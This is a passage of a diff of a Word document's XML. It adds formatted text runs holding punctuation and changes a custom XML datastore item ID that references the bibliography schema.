+        </w:rPr>
+        <w:t>]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -8348,7 +8380,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DDEBB527-0775-4093-B47D-6D640F5CCF0B}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{B9D62E69-8590-440E-8DE6-C7338654D6F7}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
